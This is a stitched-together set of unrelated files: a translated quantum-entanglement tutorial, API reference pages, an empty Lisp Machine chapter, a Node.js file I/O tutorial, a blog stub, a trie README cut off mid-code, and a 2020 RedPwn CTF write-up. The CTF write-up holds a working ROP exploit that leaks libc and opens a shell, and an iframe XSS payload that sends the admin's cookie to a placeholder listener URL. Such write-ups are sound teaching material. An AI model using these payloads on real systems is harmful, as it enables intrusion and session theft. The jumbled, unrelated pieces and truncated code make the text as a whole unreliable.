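# Basis index = 2*q1 + q0, i.e. [|00>, |01>, |10>, |11>]

def h_on_q0(v):
    """Hadamard on qubit q0 (the rightmost digit of the label)."""
    out = [0.0] * 4
    for q1 in (0, 1):
        a, b = v[2 * q1 + 0], v[2 * q1 + 1]
        out[2 * q1 + 0] = s * (a + b)
        out[2 * q1 + 1] = s * (a - b)
    return out

def cnot_q0_controls_q1(v):
    """Flip q1 when q0 is 1: swaps the amplitudes of |01> and |11>."""
    out = v[:]
    out[1], out[3] = v[3], v[1]
    return out

bell = cnot_q0_controls_q1(h_on_q0([1.0, 0.0, 0.0, 0.0]))
print(bell)   # ≈ [0.707, 0, 0, 0.707] -> (|00> + |11>)/sqrt(2)
```

Only the all-0 and all-1 amplitudes survive: the two qubits are individually random but perfectly correlated, exactly as described above.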
Two examples of Bell (entangled) states:




Some people may find this hard to believe. Our classical intuition says that the two particles are not in a superposition of two states until measured; rather, one particle was really 1 all along and the other really 0. This is called a "local hidden variable" theory.
## [Bell and GHZ Tests](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F002-Bell_and_GHZ_Tests)
To finally settle the question above, John Bell devised an experiment called the Bell test (later extended to the CHSH inequality). He realized that measuring two entangled qubits along the same axis (for example Z) always gives complementary responses, but that this could have a classical explanation (specific rules that predetermine the outcomes). Instead, Bell saw that he could measure the two qubits along different directions and collect statistics on the results, which can be used to show that the particles' behavior is not classical. Describing this work requires some statistics, so we will not pursue it here. Instead, we introduce a more advanced multi-qubit entangled state.
Suppose we now have three qubits instead of two. We prepare a state in which the qubits are in a superposition of all 0s and all 1s: $\frac{1}{\sqrt{2}}(\lvert 000 \rangle - \lvert 111 \rangle)$. This is called the GHZ state, named after Greenberger, Horne, and Zeilinger, who in 1989 were the first to study it. By performing a series of measurements on this state, we can show that it violates certain assumptions that most people take to be "truths" about our world.
Classically, a particle (in our case, a qubit) can have only one of two outcomes when measured: 0 or 1. Furthermore, if the particles were classical, there could be "hidden variables" that determine the outcome ahead of the measurement. To exhibit the quantum nature of the GHZ state, and to show that no such hidden variables exist, we need to consider the different combinations (called correlations) of the possible outcomes of measurements along different bases (X and Y). This is documented in detail in N. David Mermin's 1990 paper, "What's wrong with these elements of reality?"

Imagine you have three independent systems, represented by the blue, red, and green boxes. You are now asked to solve the following problem: in each box there are two questions, labeled X and Y, and each question has only two possible outcomes, 1 or -1. The three systems could be three qubits entangled in the GHZ state. We want to examine the correlations between the qubits carefully.
For the purposes of this example, instead of mapping the $\lvert 0 \rangle$ state to the number 0 and the $\lvert 1 \rangle$ state to the number 1, we map the $\lvert 0 \rangle$ state to the number 1 and the $\lvert 1 \rangle$ state to the number -1 (this avoids losing information by multiplying by 0 along the way). The measurement outcome of each qubit is 1 or -1; we multiply the results together and look at the correlations.
Here is how the notation works. Suppose the three qubits are in the state $\lvert 000 \rangle$. When we measure all three along the Z axis, we denote the quantum measurement ZZZ. With the mapping defined above, the outcomes are 1, 1, 1, and multiplying them gives ZZZ = 1. For the state $\lvert 001 \rangle$, a ZZZ measurement gives -1.
To measure in another basis, say XXX, we need to apply quantum gates before the measurement to rotate the qubits onto the Z axis. For XXX, this means applying a Hadamard gate to each qubit before measuring. We can also perform the following measurements on the three qubits, with these results:

Translator's note: if the above still feels unclear, this article gives an accessible explanation: [Is the math behind quantum mechanics complicated?](https://mp.weixin.qq.com/s/YRjZU1giwfJoJQavN6R9oA)
## [Bell and GHZ Tests (Cont.)](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F003-Bell_and_GHZ_Tests_(Cont.))
Here we show that our classical intuition is wrong.
Suppose that instead of performing quantum measurements on a quantum system, we perform "classical" measurements on an analogous "classical" system. To distinguish the two, we write a classical measurement along the X direction as "$M_X$" and along Y as "$M_Y$". If the outcome for each qubit ($M_X$ or $M_Y$) were already determined before the measurement, then we could substitute "1" or "-1" for each qubit's $M_X$ and $M_Y$ (even though we do not yet know which). Each of the expressions below then represents a measurement of the three qubits, and we multiply down each column from top to bottom to get the result for a single qubit (still assuming the outcomes are predetermined and mutually independent).

Let's multiply down one of the columns, for example the third qubit's. As you can see, we get $M_X * M_Y * M_Y$. We already know each of these outcomes can only be one of two values: 1 or -1. That means the value of $M_Y * M_Y$ is 1, so the expression simplifies to $M_X$. Doing this for every column, we find that the equations above reduce to $M_{X,Q3}M_{X,Q2}M_{X,Q1} = 1$. This is the result we would get if the system were classical. However, **quantum mechanics and experiment** both tell us that the XXX measurement of the GHZ state gives $XXX = -1$!
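The column-multiplication argument can also be checked exhaustively: for every classical assignment of $\pm 1$ values to the six quantities ($M_X$ and $M_Y$ for each of the three qubits), the product of the three mixed measurements forces XXX to equal +1, so no hidden-variable assignment can reproduce the quantum prediction $XXX = -1$. A brute-force sketch:

```python
from itertools import product

# Classical hidden-variable model: each qubit carries predetermined values
# (mx, my) in {+1, -1} for its X and Y measurements.
for q1, q2, q3 in product(product([1, -1], repeat=2), repeat=3):
    (x1, y1), (x2, y2), (x3, y3) = q1, q2, q3
    xyy = x1 * y2 * y3
    yxy = y1 * x2 * y3
    yyx = y1 * y2 * x3
    xxx = x1 * x2 * x3
    # Every y appears twice in the product, and (+-1)^2 = 1, so:
    assert xyy * yxy * yyx == xxx
    # In particular, no assignment gives XYY = YXY = YYX = 1 with XXX = -1
    assert not (xyy == yxy == yyx == 1 and xxx == -1)

print("all 64 classical assignments force XXX = (XYY)(YXY)(YYX)")
```

Sixty-four assignments cover every possible hidden-variable table, and all of them contradict the measured GHZ correlations.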
Based on the results of these experiments, we have to accept what quantum mechanics tells us: there is no hidden information in each qubit's state, independent of the other two, that determines the results of the X and Y measurements in advance. The outcome of an X or Y measurement on any given qubit is fundamentally related to the outcomes of the X or Y measurements on the qubits it is entangled with. For example, if the Y measurements on qubits 2 and 3 give +1, then an X measurement on qubit 1 gives +1. If the X measurements on qubits 2 and 3 give +1, then an X measurement on qubit 1 gives -1. Strange, but true!
## [Results from the GHZ Test in the Quantum Experience](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F004-Results_from_the_GHZ_test_in_the_Quantum_Experience)
Amazingly, we can test this in the Quantum Experience by creating the GHZ state: applying gates to three qubits to put them into a superposed, entangled state, and performing the combinations of measurements described above. When we measure all three qubits along the X basis, we obtain the case equivalent to "-1", in contrast to measuring the first two qubits along the Y basis and the third qubit along the X basis.
Our observations tell us that the system behaves exactly as quantum mechanics predicts, not as our classical intuition predicts!

Note again: if we measure in the standard basis (along Z), we obtain only 000 and 111. The noise (small errors) in the table below comes from experimental error, because we are using a real quantum processor, which is imperfect.
 | 48.522807 | 495 | 0.766361 | yue_Hant | 0.583996 |
---
description: "Learn more about: Windows7Grbits.ColumnCompressed field"
title: Windows7Grbits.ColumnCompressed field (Microsoft.Isam.Esent.Interop.Windows7)
TOCTitle: ColumnCompressed field
ms:assetid: F:Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
ms:mtpsurl: https://msdn.microsoft.com/library/microsoft.isam.esent.interop.windows7.windows7grbits.columncompressed(v=EXCHG.10)
ms:contentKeyID: 55104262
ms.date: 07/30/2014
ms.topic: reference
f1_keywords:
- Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
dev_langs:
- CSharp
- JScript
- VB
- other
api_name:
- Microsoft.Isam.Esent.Interop.Windows7.Windows7Grbits.ColumnCompressed
topic_type:
- apiref
- kbSyntax
api_type:
- Managed
api_location:
- Microsoft.Isam.Esent.Interop.dll
ROBOTS: INDEX,FOLLOW
---
# Windows7Grbits.ColumnCompressed field
Compress data in the column, if possible.
**Namespace:** [Microsoft.Isam.Esent.Interop.Windows7](./microsoft.isam.esent.interop.windows7-namespace.md)
**Assembly:** Microsoft.Isam.Esent.Interop (in Microsoft.Isam.Esent.Interop.dll)
## Syntax
``` vb
'Declaration
Public Const ColumnCompressed As ColumndefGrbit
'Usage
Dim value As ColumndefGrbit
value = Windows7Grbits.ColumnCompressed
```
``` csharp
public const ColumndefGrbit ColumnCompressed
```
## See also
#### Reference
[Windows7Grbits class](./windows7grbits-class.md)
[Windows7Grbits members](./windows7grbits-members.md)
[Microsoft.Isam.Esent.Interop.Windows7 namespace](./microsoft.isam.esent.interop.windows7-namespace.md)
| 25.459016 | 128 | 0.799099 | yue_Hant | 0.913278 |
## Chapter 3.22
# Build Your Own Lisp Machine
> "Revolution is an art that I pursue rather than a goal I expect to achieve. Nor is this a source of dismay; a lost cause can be as spiritually satisfying as a victory."
> <footer>Robert A. Heinlein, <em>The Moon Is a Harsh Mistress</em></footer>
**Note:** *the exercises in this chapter will require specialized hardware components to complete, and due to the prohibitive cost and lack of availability for some readers, it should be considered optional*.
Few topics capture the imagination of budding Lisp Hackers more than the legendary Lisp Machines of the 70s and 80s---the first personal workstations in a world of time-shared, multi-user mainframes, with a fully integrated and interactive hardware and software environment, that seemed to offer unrivaled competitive-edge for the team that could afford them. Unfortunately, with the rise of IBM-Compatible Personal Computers, available at a fraction of the cost, the highly specialized and costly Lisp Machines were the first casualties of the AI Winter. But the dream of the Lisp Machine has never died.
Back in the 80s, there were a significant number of competing architectures, the various Lisp Machine chipsets being only a small number of them; but over the past 30 years, there has been a significant push by Intel to be the dominant architecture through a process of generalization---by developing a processor architecture that was more generally useful to multiple platforms and purposes, instead of being specialized, they were able to cater to more users and rapidly seize control of the largest market share---even going so far as to partner with Apple, to unify the underlying, previously competing architectures of Macintosh and IBM-Compatible PCs.
But over the past decade, there has been a shift back towards specialized hardware, heavily prompted by the Internet-of-Things movement and the surprising success of mobile devices and smartphones. These days, reprogrammable hardware is available for little more than a full professional workstation, and once a chipset design has been tested extensively on an FPGA-based board, it can be ported to an ASIC design for microfabrication by a host of companies with competitive rates. These days, pretty much anyone can design, test, and implement a custom computer architecture, and get their design built and shipped to their front door as a big wafer. In one sense, it's a little silly, since this plethora of home-built architectures means more and more platforms exist, for which there is no compatible software or compilers---but combined with a sensible use of an existing standard instruction set, it does make for a powerful toolchain for the home inventor.
As we have already covered in previous chapters, it's common knowledge that Lisp can be defined in Lisp---so it stands to reason to also implement the architecture of a Lisp Machine in Lisp, that can be output to the synthesizable Verilog code that will be written to the FPGA or used to fabricate an ASIC. And by implementing the core constructs of the language as the machine language of a Lisp Machine, you eliminate one of the most troublesome aspects of compiler design and optimization.
This chapter will contain a review of available FPGA-based boards and ASIC manufacturers; a brief primer on synthesizable Verilog, and a DSL for producing Verilog/VHDL from Common Lisp source-code; and a schema for a 64-bit Lisp Machine. As an extra credit exercise, we will modify an existing Common Lisp implementation to run directly on this Lisp Machine and use it as the basis for a LispOS for your new Lisp Machine.
## Exercise 3.22.1
**Hardware Prototyping and Fabrication**
```lisp
```
## Exercise 3.22.2
**Field Programmable Gate Arrays**
```lisp
```
## Exercise 3.22.3
**Application-Specific Integrated Circuits**
```lisp
```
## Exercise 3.22.4
**Prototyping CPUs**
```lisp
```
## Exercise 3.22.5
**Synthesizable Verilog**
```lisp
```
## Exercise 3.22.6
**More Synthesizable Verilog**
```lisp
```
## Exercise 3.22.7
**Even More Synthesizable Verilog**
```lisp
```
## Exercise 3.22.8
**Generating Verilog/VHDL from Common Lisp**
```lisp
```
## Project 3.22.9
**A DSL for Verilog/VHDL**
```lisp
```
## Exercise 3.22.10
**Hardware Support for Common Lisp's Special Forms**
```lisp
```
## Exercise 3.22.11
**The Lisp Machine's Memory Model**
```lisp
```
## Exercise 3.22.12
**A 64-Bit Lisp Machine Architecture**
```lisp
```
## Project 3.22.13
**Common Lisp for the Lisp Machine**
```lisp
```
## Project 3.22.14
**Porting the LispOS to the Lisp Machine Architecture**
```lisp
```
# Hu Zhenyu's Blog
Personal blog built with Jekyll.
# `req.params`
An object containing parameter values parsed from the URL path.
For example, if you have the route `/user/:name`, then the "name" from the URL path will be available as `req.params.name`. This object defaults to `{}`.
### Usage
```usage
req.params;
```
### Notes
> + When a route address is defined using a regular expression, each capture group match from the regex is available as `req.params[0]`, `req.params[1]`, etc. This strategy is also applied to unnamed wild-card matches in string routes such as `/file/*`.
<docmeta name="displayName" value="req.params">
<docmeta name="pageType" value="property">
| 25.4 | 253 | 0.714961 | eng_Latn | 0.995458 |
# PEC2 Exercises
## [Exercise 1](ej1/pec2-ej1.md)
## [Exercise 2](ej2/pec2-ej2.md)
## [Exercise 3](ej3/pec2-ej3.md)
---
layout: post
title: RedPwn CTF Writeup
date: 2020-06-25 01:00 +0700
modified: 2020-03-07 16:49:47 +07:00
description: 0x90skids writeups for the 2020 RedPwn CTF Competition
tag:
- ctf
- writeup
image: https://0x90skids.com/redpwn-ctf-writeup/carbon.png
author: 0x90skids
summary: 0x90skids writeups for the 2020 RedPwn CTF Competition
comments: true
---
> RedPwn is an annual CTF event hosted online. 0x90skids recently competed in the 2020 competition and placed 63 overall.
<div class="row mt-3">
<div class="col-sm mt-3 mt-md-0">
<img class="img-fluid rounded z-depth-1" src="carbon.png">
</div>
</div>
# Categories
+ [Misc](#misc)
+ [Pwn](#pwn)
+ [Web](#web)
## Misc
### misc/uglybash
**Solved By:** tbutler0x90
**Points:** 359
**Flag:** flag{us3_zsh,-dummy}
##### Challenge
This bash script evaluates to echo dont just run it, dummy # flag{...} where the flag is in the comments. The comment won't be visible if you just execute the script. How can you mess with bash to get the value right before it executes?
*Exerpt of Challenge Script, cmd.sh*
> ```${*%c-dFqjfo} e$'\u0076'al "$( ${*%%Q+n\{} "${@~}" $'\160'r""$'\151'$@nt"f" %s ' }~~@{$"```
##### Solution
1) To see what the bash script evaluates to just prior to execution, the script was run in debug (xtrace) mode with the -x flag. Additionally, lines were added to the top of the script to redirect the trace output to a file via `BASH_XTRACEFD`.
```bash
#!/bin/bash
exec 5> debug_output.txt
BASH_XTRACEFD="5"
### original script goes below here
```
2) The script was run with the -x flag.
```bash
bash -x cmd.sh
```
3) The flag was located in the comments along the left side of debug_output.txt, lines 70-108.
<figure>
<img src="uglybash.png" alt="results of debug">
<figcaption>Fig 1. Flag is spelled out downwards on the left side</figcaption>
</figure>
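Reading the flag off the left margin by eye works, but it can also be scripted. The helper below is hypothetical (the file name `debug_output.txt` and the line range 70-108 simply match the steps above); it joins the first visible character of each line in that range:

```python
import os

def first_chars(path, start=70, end=108):
    """Join the first non-whitespace character of each line in [start, end] (1-indexed)."""
    with open(path) as f:
        lines = f.read().splitlines()
    return ''.join(line.lstrip()[:1] for line in lines[start - 1:end])

if os.path.exists('debug_output.txt'):
    print(first_chars('debug_output.txt'))
```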
## Pwn
### pwn/the-library
**Solved By:** cernec1999
**Points:** 424
**Flag:** flag{jump_1nt0_th3_l1brary}
##### Challenge
There's not a lot of useful functions in the binary itself. I wonder where you can get some...
##### Solution
When solving a binary exploitation task, the first step I normally take is to check out the permissions of the binary. We can use the ```checksec``` tool to do this. Additionally, we should check out the architecture of the binary.
```console
cernec1999@ccerne:~/Downloads$ checksec the-library
[*] '/home/cernec1999/Downloads/the-library'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
cernec1999@ccerne:~/Downloads$ file the-library
the-library: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3067a5291814bef337dafc695eee28f371370eae, not stripped
```
With this information, it seems that intermediate binary exploitation techniques can be applied to solve this challenge. Fortunately, there are no stack cookies and the binary is not position independent. However, DEP is enabled, so we cannot simply jump to the stack to run shellcode.
Because of the challenge name, ```the-library```, my best assumption is that we need to jump to libc.
We are given no information about the host system, but we can assume that full ASLR is enabled and that the libraries are randomized. This means that every time a binary executes, the kernel assigns it a new base address to make exploitation harder. Thus, there must be a way for us to somehow leak the libc base address for system.
Unfortunately, we cannot use a format string vulnerability to leak the base address of libc. Instead, we can use a traditional buffer overflow vulnerability, utilizing some ROP gadgets, to gather the information that we need. Fortunately, we are given the source, so we can easily figure out how to trigger the overflow.
```c
#include <stdio.h>
#include <string.h>
int main(void)
{
char name[16];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts("Welcome to the library... What's your name?");
read(0, name, 0x100);
puts("Hello there: ");
puts(name);
}
```
Using GDB, I figured out that exactly 24 bytes can be written into ```name``` before the return address is written to. Next, it is time to figure out useful gadgets to leak the libc base address. This should be pretty easy with a couple of leaked gadgets. In the Global Offset Table, at address ```0x600ff0``` is where ```__libc_start_main``` is stored. We can call ```puts``` in the binary to leak this address. Finally, we should jump back to the start of the code to get another overflow to jump to the ```system``` address in the libc library. Here is the code to do all of that:
```python
import struct, sys, telnetlib
# Connection info
HOST = '2020.redpwnc.tf'
PORT = '31350'
# Init a new Telnet session
my_tel = telnetlib.Telnet(HOST, PORT)
def p64_b(num):
return struct.pack('<Q', num)
def p64_i(b_arr):
return struct.unpack('<Q', b_arr)[0]
# Gadgets to leak libc
POP_RDI_RET = p64_b(0x400733)
LIBC_START = p64_b(0x600ff0)
PUTS_PLT = p64_b(0x400520)
START = p64_b(0x400550)
# Leak __libc_start_main address then jump
chain = b'A'*24 + POP_RDI_RET + LIBC_START + PUTS_PLT + START
my_tel.write(chain)
```
Next, given this information, we should figure out where in libc to jump to. Fortunately, we are given the libc that is linked at runtime on the host system. There is a [great resource you can use](https://libc.blukat.me/) to identify a version of libc easily. I used this tool to figure out that the library is ```libc6_2.27-3ubuntu1_amd64```. It additionally calculated the offsets to useful functions.

Using this useful information, we can do the following:
1. Put a pointer to /bin/sh into RDI
2. Jump to system
Thus, our finished exploit looks like this:
```python
#!/usr/bin/python3
import struct, sys, telnetlib
# Connection info
HOST = '2020.redpwnc.tf'
PORT = '31350'
# Init a new Telnet session
my_tel = telnetlib.Telnet(HOST, PORT)
def p64_b(num):
return struct.pack('<Q', num)
def p64_i(b_arr):
return struct.unpack('<Q', b_arr)[0]
# Gadgets to leak libc
POP_RDI_RET = p64_b(0x400733)
LIBC_START = p64_b(0x600ff0)
PUTS_PLT = p64_b(0x400520)
START = p64_b(0x400550)
# Leak __libc_start_main address then jump
chain = b'A'*24 + POP_RDI_RET + LIBC_START + PUTS_PLT + START
my_tel.write(chain)
# Get rid of junk
my_tel.read_until(b'there: ')
my_tel.read_until(b'\x0a')
my_tel.read_until(b'\x0a')
# Read the leaked address; this is &__libc_start_main, not the libc base
libc_start_main = p64_i(my_tel.read_very_eager()[0:6] + b'\x00\x00')
# Now, with new information, jump to system!
# (these constants are deltas from __libc_start_main in this libc build)
BIN_SH_STR = p64_b(libc_start_main + 0x1923ea)
RET_GADGET = p64_b(0x400506)
SYSTEM_ADDR = p64_b(libc_start_main + 0x2d990)
# Construct the ROP chain
chain = b'A' * 24 + POP_RDI_RET + BIN_SH_STR + RET_GADGET + SYSTEM_ADDR
my_tel.write(chain)
my_tel.interact()
```
Voilà!
```console
cernec1999@ccerne:~/Downloads$ ./exp.py
Hello there:
AAAAAAAAAAAAAAAAAAAAAAAA3@
cat flag.txt
flag{jump_1nt0_th3_l1brary}
```
## Web
### web/static-static-website
**Solved By:** Bib<br>
**Points:** 435<br>
**Flag:** flag{wh0_n33d5_d0mpur1fy}
##### Challenge
Seeing that my last website was a success, I made a version where instead of storing text, you can make your own custom websites! If you make something cool, send it to me [here](https://admin-bot.redpwnc.tf/submit?challenge=static-static-hosting)
Site: [static-static-hosting.2020.redpwnc.tf](https://static-static-hosting.2020.redpwnc.tf/)
Note: The site is entirely static. Dirbuster will not be useful in solving it.
##### Solution
To solve this, I needed to create an HTML page that, when opened by the "admin", would steal their cookies.
So the first thing I did was check the source of the page to see whether any sanitization was done when it was created.
The page has a ```script.js``` file that contained the following:
```javascript
(async () => {
  await new Promise((resolve) => {
    window.addEventListener('load', resolve);
  });
  const content = window.location.hash.substring(1);
  display(atob(content));
})();

function display(input) {
  document.documentElement.innerHTML = clean(input);
}

function clean(input) {
  const template = document.createElement('template');
  const html = document.createElement('html');
  template.content.appendChild(html);
  html.innerHTML = input;
  sanitize(html);
  const result = html.innerHTML;
  return result;
}

function sanitize(element) {
  const attributes = element.getAttributeNames();
  for (let i = 0; i < attributes.length; i++) {
    // Let people add images and styles
    if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
      element.removeAttribute(attributes[i]);
    }
  }
  const children = element.children;
  for (let i = 0; i < children.length; i++) {
    if (children[i].nodeName === 'SCRIPT') {
      element.removeChild(children[i]);
      i--;
    } else {
      sanitize(children[i]);
    }
  }
}
```
This told me that they removed all attributes except for ```src```, ```width```, ```height```, ```alt``` & ```class```.
Also, it removes the ```<script>``` tags and everything that's inside.
I've confirmed that I could do XSS by using an ```<iframe>``` or ```<embed>``` tag.
This is where I fell down a major rabbit hole...
Because of the filtered attributes, I thought that they wanted us to craft an SVG image containing malicious code. Unfortunately, that was not the case.
After losing a couple of hours down that rabbit hole, I decided to look for another solution.
Then I thought of another idea: why not send a hidden form that submits itself when the "admin" clicks the link?
So I came up with this code:
```html
<html>
  <head>
  </head>
  <body>
    <iframe src="javascript:var f=document.createElement('form');f.action='http://LISTENER_URL_HERE/';f.method='POST';f.target='_blank';var k=document.createElement('input');k.type='hidden';k.name='flag';k.value=document.cookie;f.appendChild(k);document.body.appendChild(f);f.submit();console.log('Cookie stolen!');"></iframe>
  </body>
</html>
```
The main caveat here was the use of ```target='_blank'```.
Without opening the submission in a new tab, the form would carry the iframe's own (empty) cookies, so no cookie was returned.
So finally, submitting this code to the admin page stole the cookie containing the flag and sent it to my listener.
I'm pretty happy with this solve, even though I went down a time-losing rabbit hole.
That SVG stuff was actually useful in another CTF we did later on.
```flag{wh0_n33d5_d0mpur1fy}```
# Linux service Configs

# Legal Notice:
I don't recommend or condone using anything on here for any reason. The scripts here may work, but they are just as likely to break the system they are run on. If you use them, you do so at your own risk. I have NEVER authorized, condoned, or recommended the use of anything in any of my repos for any reason, even if previously stated. This is a collection of simple code I found useful with my own Kali OS, for educational purposes only. All credit goes to the authors whose full URL and/or GitHub account and/or repo is listed in the section above; please see their sites for more info or for issues with their repos. Note that all of this is publicly available. Do not use it for evil or malicious purposes, or on machines you do not own.
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <http://unlicense.org>
---
layout: post
title: "[nodejs] 007# File I/O"
tags: [nodejs, server_basic]
categories: nodejs
---
#### ◇ File I/O
nodejs provides two kinds of functions for reading and writing files: synchronous and asynchronous. Since nodejs favors event-driven asynchronous processing, asynchronous file reading and writing is the default.
In this post, we will run an example that uses the url module to read a file and deliver it to the client when the requested resource is a file.
### 1. Reading a file
- Create a file_read.js file.
{% highlight javascript linenos %}
// 1. Use the fs (file system) module
var fs = require('fs');

// 2. Read a file asynchronously
// - after the file is read, the callback passed as the last parameter is invoked
fs.readFile('module_example.js', 'utf-8', function(error, data) {
    console.log('01 readAsync : %s', data);
});

// 3. Read a file synchronously
// - the contents are stored in the data variable after the read completes
var data = fs.readFileSync('module_example.js', 'utf-8');
console.log('02 readSync : %s', data);
{% endhighlight %}
- Although the readFile() call comes first, it reads the file asynchronously (the work is done on another thread), so the synchronous readFileSync() call is processed first.

### 2. Writing a file
- Create a file_write.js file.
{% highlight javascript linenos %}
var fs = require('fs');
// 1. String to be written into the newly created files
var data = "File Write Test";

// 2. Create a file asynchronously
// - parameters: file name, data, encoding, callback
fs.writeFile('file01_async.txt', data, 'utf-8', function(e) {
    if(e) {
        // 3. If an error occurred while creating the file, print it to the console
        console.log(e);
    } else {
        // 4. If there was no error, print a completion message
        console.log('01 WRITE DONE!');
    }
});

// 5. The synchronous version cannot report errors through a callback,
//    so wrap the whole call in a try statement
try {
    // 6. Create a file synchronously
    // - parameters: file name, data, encoding
    fs.writeFileSync('file02_sync.txt', data, 'utf-8');
    console.log('02 WRITE DONE!');
} catch(e) {
    console.log(e);
}
{% endhighlight %}
- As with file reading, the log from the synchronous call is printed first.
- If you open the text files, you can confirm that they contain the string assigned to the data variable.

### 3. Handling file requests from a browser
#### 1) Create the html file that will be requested.
- file_test.html
```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>file test</title>
</head>
<body>
  <h1>Hello</h1>
  This is an example of handling a file request from the client. <br>
  It is handled by server_req_file.js.
</body>
</html>
```
#### 2) Create the server_req_file.js file that will handle the request.
- server_req_file.js
{% highlight javascript linenos %}
var http = require('http');
var url = require('url');
var fs = require('fs');
var server = http.createServer(function(request, response) {
    var parsedUrl = url.parse(request.url);
    var resource = parsedUrl.pathname;

    // 1. If the requested resource is /test
    if(resource == '/test') {
        // 2. read the file_test.html file
        fs.readFile('file_test.html', 'utf-8', function(error, data) {
            // 2-1. if an error occurred while reading, send the error details
            if(error) {
                response.writeHead(500, {'Content-Type':'text/html'});
                response.end('500 Internal Server Error : ' + error);
            } else {
                // 2-2. if the read completed without errors, deliver the file contents to the client
                response.writeHead(200, {'Content-Type':'text/html'});
                response.end(data);
            }
        });
    } else {
        response.writeHead(404, {'Content-Type':'text/html'});
        response.end('404 Page Not Found');
    }
});
server.listen(9074, function() {
    console.log('Server is running...');
});
{% endhighlight %}
#### 3) Running it
- After running the server_req_file created in 2), request [http://localhost:9074/test](http://localhost:9074/test) and you can confirm that the page written in 1) is displayed.

---
translation: automatic
title: Very small LDL-d
description: A subtype of very small LDL
---
---
layout: post
item_id: 2683981048
title: >-
  The campaign is over, Bolsonaro! You have to understand that you won, dammit!!!
author: Tatu D'Oquei
date: 2019-08-06 05:19:00
pub_date: 2019-08-06 05:19:00
time_added: 2019-08-07 05:56:45
category:
tags: []
image: https://conteudo.imguol.com.br/blogs/278/files/2019/08/johhnybravo-615x300.jpg
---
"A campanha acabou para a imprensa. Eu ganhei! A imprensa tem que entender que eu, Johnny Bravo, Jair Bolsonaro, ganhou, porra! Ganhou, porra! Vamos entender isso. Vamos trabalhar junto pelo Brasil. O trabalho de vocês é excelente. Desde que seja bem-feito.
**Link:** [https://reinaldoazevedo.blogosfera.uol.com.br/2019/08/06/a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra/](https://reinaldoazevedo.blogosfera.uol.com.br/2019/08/06/a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra/)
# nim-trie
# MOVED TO https://github.com/status-im/nim-eth
Nim Implementation of the Ethereum Trie structure
---
[")](https://travis-ci.org/status-im/nim-eth-trie)
[")](https://ci.appveyor.com/project/nimbus/nim-eth-trie)
[](https://opensource.org/licenses/Apache-2.0)
[](https://opensource.org/licenses/MIT)

## Hexary Trie
## Binary Trie
Binary-trie is a dictionary-like data structure for storing key-value pairs.
Much like its sibling Hexary-trie, the key-value pairs are stored in a key-value flat-db.
The primary difference from Hexary-trie is that each node of Binary-trie has only one or two children,
while a Hexary-trie node can contain up to 16 or 17 child-nodes.
Unlike Hexary-trie, Binary-trie stores its data in the flat-db without using rlp encoding.
Binary-trie stores its values using a simple **Node-Types** encoding.
The encoded node is hashed with keccak_256, and the hash value becomes the key in the flat-db.
Each entry in the flat-db looks like:
| key | value |
|----------------------|--------------------------------------------|
| 32-bytes-keccak-hash | encoded-node(KV or BRANCH or LEAF encoded) |
### Node-Types
* KV = [0, encoded-key-path, 32 bytes hash of child]
* BRANCH = [1, 32 bytes hash of left child, 32 bytes hash of right child]
* LEAF = [2, value]
The KV node can have a BRANCH node or a LEAF node as its child, but not another KV node.
The internal algorithm will merge a KV(parent)->KV(child) pair into one KV node.
Every KV node contains encoded keypath to reduce the number of blank nodes.
The BRANCH node can have KV, BRANCH, or LEAF nodes as its children.
The LEAF node is the terminal node; it contains the value of a key.
### encoded-key-path
While Hexary-trie encodes the path using Hex-Prefix encoding, Binary-trie
encodes the path using binary encoding; the scheme is shown in the table below.
```text
|--------- odd --------|
00mm yyyy xxxx xxxx xxxx xxxx
|------ even -----|
1000 00mm yyyy xxxx xxxx xxxx
```
| symbol | explanation |
|--------|--------------------------|
| xxxx | nibble of binary keypath in bits, 0 = left, 1 = right|
| yyyy | nibble contains 0-3 bits padding + binary keypath |
| mm | number of binary keypath bits modulo 4 (0-3) |
| 00 | zero zero prefix |
| 1000 | even numbered nibbles prefix |
If there is no padding, then the yyyy bit sequence is absent and mm is zero.
yyyy = mm bits + padding bits must be 4 bits long.
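As an illustration of this scheme, here is a small Python sketch of the encoding (the library itself implements this in Nim, so treat this as an unofficial model of the table above):

```python
def encode_keypath(bits: str) -> bytes:
    """Encode a binary keypath ('0' = left, '1' = right) per the table above."""
    mm = len(bits) % 4                     # number of keypath bits modulo 4
    padded = "0" * ((4 - mm) % 4) + bits   # yyyy nibble = padding + leading bits
    if (len(padded) + 4) % 8 == 0:         # the "00mm" prefix alone keeps byte alignment
        full = "00" + format(mm, "02b") + padded
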